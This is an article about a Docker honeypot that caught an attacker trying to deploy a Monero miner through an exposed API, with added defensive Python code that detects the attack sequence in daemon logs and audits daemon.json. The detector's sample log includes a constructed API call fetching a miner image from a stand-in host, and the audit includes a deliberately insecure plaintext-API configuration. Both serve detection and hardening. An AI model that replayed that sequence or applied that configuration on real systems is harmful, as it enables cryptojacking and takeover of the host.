The characteristics of cloud containers that make them attractive to data center managers also make them attractive to crypto-miners.
The ease of setup, the isolation and the performance advantages, coupled with the fact that containers may not enjoy the same level of security as hardware infrastructure, mean that an attacker can operate crypto-currency mining in relative safety and with a reduced risk of discovery.
Researchers at Aqua Security Software said that they’d heard about crypto-currency mining attacks on Docker containers and wanted to learn how they were carried out. They also wanted to check the operations of the Aqua Container Security Platform. To accomplish this, they set up a honeypot.
Honeypots are computers set up to attract attackers. They appear to be legitimate assets, but they usually contain no real data, and they are thoroughly instrumented and logged so that the attacker can be observed and the weaknesses they exploit can be fixed.
Honeypots are not new. Computers as honeypots have been around for decades. I first set one up to find out who was attempting to infiltrate a military computer system for which I was responsible in the mid-1980s, and I wasn’t the first.
In this case, the researchers at Aqua created an unprotected Docker installation and waited to see what would happen. As the researchers explained in their blog, “We deployed a virtual machine, installed docker on it and exposed it to the internet.”
Notably, Aqua left the Docker daemon’s plain HTTP API port reachable from the internet, with neither encryption nor authentication, so anyone who could connect to it could issue commands to the daemon. They also deployed their Aqua Enforcer, which prevents unauthorized activities in containers, so even if an attacker gained access, they wouldn’t be able to do anything useful.
Two days later, an attacker who had been scanning the internet for exposed Docker API ports found the Aqua honeypot and set to work. The attacker first queried the version of Docker that was installed, then started issuing image and container management commands.
First the attacker tried “docker import”, which builds an image from a tarball (one that can be fetched from a URL), to bring in an image containing the crypto-currency mining software. Then the attacker tried “docker create”, which creates a container from an image and returns the container ID without starting it. Normally that would be followed by a “docker start” command, but because the create command failed, the attacker was unable to get the malicious software running.
So the attacker changed tactics and tried other Docker commands, which also failed. Eventually the attacker gave up trying to install the Monero crypto-currency mining packages in the Docker environment.
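The sequence above maps onto a small number of Docker Engine API calls: a version probe (GET /version), an image fetch (POST /images/create, which is what both “docker import” and “docker pull” issue, with a fromSrc or fromImage parameter), a container create (POST /containers/create) and, if it gets that far, a start (POST /containers/{id}/start). The following detector is an added example, not code from Aqua or from the article. It assumes dockerd is running with debug logging enabled, which makes it log every API request as `msg="Calling <METHOD> <uri>"`; the sample log lines, the source address 203.0.113.7 and the container ID ab12cd34 are constructed. The sample extends the honeypot sequence with the start call the attacker never got to issue, so the detector can distinguish an attempt from a successful deployment.

```python
"""Flag the recon -> image -> create -> start sequence in dockerd debug logs."""
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs

# Constructed sample in dockerd debug-log format. A real log also carries the
# traffic of legitimate clients; the detector only looks at the four stages.
SAMPLE_LOG = """\
time="2018-03-04T10:12:01Z" level=debug msg="Calling GET /_ping"
time="2018-03-04T10:12:01Z" level=debug msg="Calling GET /v1.24/version"
time="2018-03-04T10:12:03Z" level=debug msg="Calling POST /v1.24/images/create?fromSrc=http%3A%2F%2F203.0.113.7%2Fminer.tar&repo=mining"
time="2018-03-04T10:12:09Z" level=debug msg="Calling POST /v1.24/containers/create"
time="2018-03-04T10:12:11Z" level=debug msg="Calling GET /v1.24/containers/json?all=1"
time="2018-03-04T10:12:14Z" level=debug msg="Calling POST /v1.24/containers/create?name=miner"
time="2018-03-04T10:12:15Z" level=debug msg="Calling POST /v1.24/containers/ab12cd34/start"
"""

LINE_RE = re.compile(
    r'time="(?P<ts>[^"]+)" level=\w+ msg="Calling (?P<method>[A-Z]+) (?P<uri>[^"]+)"'
)
VERSION_PREFIX = re.compile(r"^/v\d+\.\d+")  # "/v1.24/version" -> "/version"


def parse_line(line):
    """Turn one dockerd debug line into (timestamp, method, path, query), or None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
    path, _, query = m["uri"].partition("?")
    return ts, m["method"], VERSION_PREFIX.sub("", path), query


def stage_of(method, path):
    """Map an API call onto a stage of the deployment sequence, else None."""
    if method == "GET" and path in ("/version", "/info"):
        return "recon"
    if method == "POST" and path == "/images/create":
        return "image"
    if method == "POST" and path == "/containers/create":
        return "create"
    if method == "POST" and re.fullmatch(r"/containers/[^/]+/start", path):
        return "start"
    return None


def detect_deploy_sequence(log_text, window=timedelta(minutes=10)):
    """Return {'verdict', 'stages', 'image_sources'} for the first probe-led
    sequence seen within `window` of the probe, or None if no probe occurred.

    verdict is 'recon-only', 'attempted' (image fetch or create seen) or
    'deployed' (a container was started).
    """
    first_probe, stages, sources = None, [], []
    for event in map(parse_line, log_text.splitlines()):
        if event is None:
            continue
        ts, method, path, query = event
        stage = stage_of(method, path)
        if stage is None:
            continue
        if first_probe is None:
            if stage != "recon":
                continue  # only count activity that follows a version/info probe
            first_probe = ts
        if ts - first_probe > window:
            break
        if stage not in stages:
            stages.append(stage)
        if stage == "image":
            q = parse_qs(query)  # parse_qs also URL-decodes the values
            sources.extend(q.get("fromSrc", []) + q.get("fromImage", []))
    if first_probe is None:
        return None
    if "start" in stages:
        verdict = "deployed"
    elif "create" in stages or "image" in stages:
        verdict = "attempted"
    else:
        verdict = "recon-only"
    return {"verdict": verdict, "stages": stages, "image_sources": sources}


if __name__ == "__main__":
    print(detect_deploy_sequence(SAMPLE_LOG))
```

The image source pulled out of the fromSrc parameter is the first thing to block and to hand to whoever owns the hosting system, which is how Aqua ended up notifying the owners of compromised machines. Debug logging is off by default and is noisy; the same sequence is visible, with less detail, in the daemon’s event stream (“docker events”).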
But in the process of running the honeypot, the folks at Aqua learned some important lessons. First, they discovered that some of the attacks were coming from other compromised systems, so they notified the owners of those systems.
Second, they discovered a site in the Netherlands that was apparently controlling the crypto-miner, where they found other tools for building crypto-currency mining attacks.
So why use Docker as a base for crypto-currency attacks? Michael Cherny, head of research for Aqua said that he thinks that the isolation of the container plays a big role. “They probably hope that the server is big enough not to notice,” Cherny explained.
Containers are inviting targets because they usually run on large computers, including cloud servers, with plenty of compute resources that are perfect for running crypto-currency mining routines. The more compute power that’s available, the more crypto-currency attackers can mine at no cost to themselves.
He said that he’s seen that crypto-mining attacks have become very popular and that it’s extremely easy to deploy the software in a container. He also said that he’s noticed that containers are frequently not well protected, especially those used for testing, development or other non-production purposes.
The blog entry also noted that configuration errors create security holes. “Another factor is that for practical reasons, engineers may take configuration shortcuts to make their work easier.” Unfortunately, such shortcuts also make the work of the attacker much easier.
The lessons of this exercise are fairly straightforward. First, remember that a container is not a separate machine: it is operating-system-level virtualization that shares the host’s kernel, so it needs just as much protection as a non-containerized operating system.
Second, remember that a container is isolated from everything else around it, which means that what goes on inside is not readily visible from outside; you need to monitor activity inside the container itself.
Third, don’t allow access that isn’t both encrypted and authenticated. For the Docker daemon, that means never exposing its plain HTTP API on a network port; if remote access is genuinely needed, use TLS with client-certificate verification.
Finally, if you don’t need to use non-production environments for long periods of time, such as at night or over a weekend, consider shutting those computers down. It’s impossible to hack into a computer that’s turned off and it saves electricity.
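The third lesson comes down to a few keys in the daemon configuration. The audit below is an added example, not code from the article or from Aqua: it reads the `hosts`, `tls`, `tlsverify` and `tlscacert` keys that dockerd accepts in /etc/docker/daemon.json and reports the configuration shortcut that left the honeypot open. The two configurations are constructed; the certificate paths are placeholders. Port 2375 is the Docker convention for the plaintext API listener and 2376 for the TLS one. The check covers daemon.json only, not the equivalent -H and --tls flags on the dockerd command line.

```python
"""Audit a Docker daemon.json for an unencrypted, unauthenticated remote API."""
import json
from urllib.parse import urlsplit

# Constructed: the shortcut the article warns about. A tcp listener on all
# interfaces with no TLS gives anyone who can reach port 2375 full control of
# the daemon, and through it root-equivalent access to the host.
WEAK_CONFIG = """
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}
"""

# Constructed: remote access kept, but only over TLS, and only for clients
# presenting a certificate signed by the CA in tlscacert.
HARDENED_CONFIG = """
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}
"""


def audit_daemon_config(text):
    """Return a list of findings; an empty list means no remote-exposure problem."""
    cfg = json.loads(text)
    findings = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if not tcp_hosts:
        return findings  # unix socket only: no network path to the daemon
    verify = bool(cfg.get("tlsverify", False))
    tls_on = bool(cfg.get("tls", False)) or verify  # tlsverify implies tls
    for h in tcp_hosts:
        if not tls_on:
            findings.append(f"{h}: plaintext API, no encryption or authentication")
        elif not verify:
            findings.append(f"{h}: TLS without client-certificate verification")
        elif not cfg.get("tlscacert"):
            findings.append(f"{h}: tlsverify set but no tlscacert to check clients against")
    # An unauthenticated listener is worse still when it is not limited to loopback.
    # urlsplit() returns hostname None for "tcp://:2375", which dockerd treats as all interfaces.
    exposed = [h for h in tcp_hosts if urlsplit(h).hostname in (None, "0.0.0.0", "::")]
    if exposed and not verify:
        findings.append("tcp listener bound to all interfaces without client authentication")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_daemon_config(cfg) or "OK")
```

On systemd-based installs the unit file’s own `-H fd://` flag conflicts with a `hosts` key in daemon.json, so the listener is often configured in a systemd drop-in instead; audit whichever of the two is actually in effect, and confirm the result from outside with a port scan of 2375 and 2376.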
It’s also important to remember that a crypto-currency mining attack might not do more than waste your server time and electricity, but it’s a sign of a more serious problem.
“While not the most malicious of attacks (data exfiltration or DDoS often have more devastating effects),” Aqua warns in its blog entry, “illicit use of cloud compute resources for mining crypto-currencies should be regarded as a big warning sign on the security posture of the mined environments—because if an attacker can run a rogue container that mines for bitcoin, they can probably run containers that do worse things.”
Finding a container that’s doing crypto-currency mining may not be the end of the world, but failure to do something about it can lead to finding something much worse. How would you like to discover that you’re hosting the command and control server for a massive ransomware operation? That could have consequences far beyond just a little wasted electricity.